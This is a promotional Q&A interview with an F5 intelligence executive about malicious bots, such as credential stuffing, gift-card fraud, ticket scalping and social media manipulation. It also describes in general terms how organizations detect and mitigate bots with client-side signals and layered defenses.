From propagating lies and manipulating social media users to disrupting global businesses, bots are an increasingly hot topic.
In part two of our Q&A with Dan Woods, Global Head of Intelligence at F5, we explore what bots do, the risks to be aware of, and how organizations can adapt to evolving threats. (Link to part one)
What are bots and why are they potentially dangerous?
Bots are snippets of code that automate tasks. Checking the balance on gift cards is one such example.
Why would anyone do this? Well, all that a bad actor needs to steal the amount stored on a gift card is the 16-digit card number and the PIN. They could use a modified version of the above bot to check the balance of millions, even billions, of card number-PIN pairs. When they find a card number-PIN pair with a balance, they can sell that to a third party. The genuine owner of the gift card won’t even realize the balance was stolen until they try to use it.
Bots are also being used to scrape insurance companies' websites. If you want a life insurance quote, you need to navigate a process that asks your age, where you live, what you do for a living, etc. Competitors and third parties can use a bot to navigate the same workflow, each time providing different answers. This enables them to reverse engineer the insurance company’s pricing algorithm.
One of the biggest issues is malicious bots being used to try spilled usernames and passwords—from the dark web or from a compromise at some enterprise—against the login application of other enterprises. Because of consumer habits to reuse usernames and passwords, these attacks typically take over 0.1-3.0% of the accounts attempted. So, when a bad actor tries hundreds of millions of username/password pairs, they end up compromising tens of millions of accounts.
Other disruptive examples include a bot buying lots of limited-time-offer sneakers or concert tickets within 30 seconds of when they go on sale, and then reselling them for inflated prices on the secondary market. Or, if a company offers something of value for opening an online account, such as a free cup of coffee, then a bot could create thousands of accounts to enjoy thousands of free cups of coffee. Or maybe a criminal organization needs a lot of online accounts to engage in money laundering.
Are all bots bad?
Not all bots are bad. For instance, Googlebot scrapes and indexes billions of websites to make searches possible. Kayak and other online travel agents scrape airline and hotel fares of many travel companies to bring its customers the best deals.
What about the impact of bots on social media companies?
A few years ago, a social media company engaged F5 to better understand the bots that were active against their web and mobile applications. When we went in-line and deployed our client-side signals (the signals that help us identify bots), we determined that more than 90% of all their logins were bot-related. Based on the high login success rate and discussions with the customer, these accounts were associated with sweetheart scams. Unfortunately, some social media companies are not interested in knowing the truth about their bot traffic because the truth would have a negative impact on their DAU and stock price/valuation.
How can bots influence public opinion and manipulate social media users?
Imagine the influence a bad actor could wield if they had programmatic control over millions of Twitter, TikTok, Facebook or Instagram accounts? For starters, they could amplify a significant volume of news and content to influence public opinion.
Over the last six to seven years, whenever I saw an incentive, a means, and the lack of a meaningful countermeasure prior to going in-line, I always observed the automation I expected after going in-line. There is no doubt in my mind that political and state actors are using social media platforms to influence public opinion and even elections.
Everyone is impressionable. Some more than others. If a comedian tells a joke and you don’t laugh, but everyone else laughs, you might start to believe the joke was actually funny. This is why sitcoms used laugh tracks. The more impressionable someone is, the more likely they are to change their opinion based on pressure from peers—even if those peers are actually bots.
Why do the companies underestimate the bot issue?
Many bots increase losses due to fraud. But the damage doesn’t end there—depending on the volume of bots, it could also raise costs associated with CDNs or fraud tools that charge based on number of transactions. Furthermore, they can negatively impact latency and ruin the user experience for legitimate customers. The skewed metrics could also negatively influence corporate spend and decision making.
Most companies want to know the truth. Those that engage F5 learn the truth, but those who try to detect bots as a DIY project almost always underestimate the size of the problem for a few reasons.
First of all, bots are now using hundreds of thousands, or even millions of IP addresses. Security teams can typically identify the top few hundred or thousand noisiest IPs. However, they miss the longtail of IPs that are only used by the bot a few times. Secondly, attacks from bots often appear gradually over time, which makes them more difficult to recognize and not confuse with organic growth. After working with F5, organizations often find the results shocking and unbelievable but they quickly become believers when they see the data.
What should organizations do to reduce the problem of bots on their sites?
Two things: they must collect client-side signals (from the user, the user agent, device, and network) and they must have two stages of defense.
Examples of client-side signals include timing of keystrokes and mouse clicks/movements, plugins, fonts, screen utilization, number of cores, how the user agent performs floating point math or renders emojis, and dozens more.
You don’t need hundreds or thousands of signals. You just need a few dozen high quality signals that are very difficult to spoof. These signals are typically collected using JavaScript in web and mobile browsers and using an SDK, installed alongside the native app. When attackers are mitigated on the web, they will transition to attacking the mobile API. The JavaScript and SDK must also be well-hardened to make reverse engineering extremely difficult.
Now let’s look at the two stages of defense.
The first stage is near real-time (sub-10ms) and leverages the signals associated with a single transaction. If signals indicate it’s an unwanted bot, take mitigating action. If signals indicate the transaction is from a human, pass it to origin for normal processing. While this first stage will identify nearly all the bots, it is not capable of keeping up with retools (when an attacker realizes their attack is being mitigated, so decides to improve his bot to overcome the countermeasure).
Retools are why organizations need a second stage of defense. While the first is near real-time, the second stage is retrospective. It’s where AI/ML models are operating on aggregate transactions (all the transactions that arrived in the last 30 seconds, minute, hour, day, few days, etc.). Even so, organizations cannot rely exclusively on AI/ML to find retools. They must have humans reviewing the alerts fired off by the AI/ML systems to weed out false positives. And make sure the AI/ML models are learning correctly. When organizations find unwanted bot traffic in the second stage, they must also be able to update real-time defenses to mitigate newly discovered bot traffic without impacting traffic from legitimate customers.
F5 provides both stages of defense, the AI/ML, and the humans, as a managed service. Battling bots should never be a DIY project.
Is the bot threat going to get worse?
It’s impossible to quantify but the bot problem has certainly increased over the last six to seven years. During this time, I’ve seen malicious and nuisance bots launch automation against companies in virtually every vertical. Just when I think I have seen all use cases, a new one emerges. Taking your eye off the ball is never an option!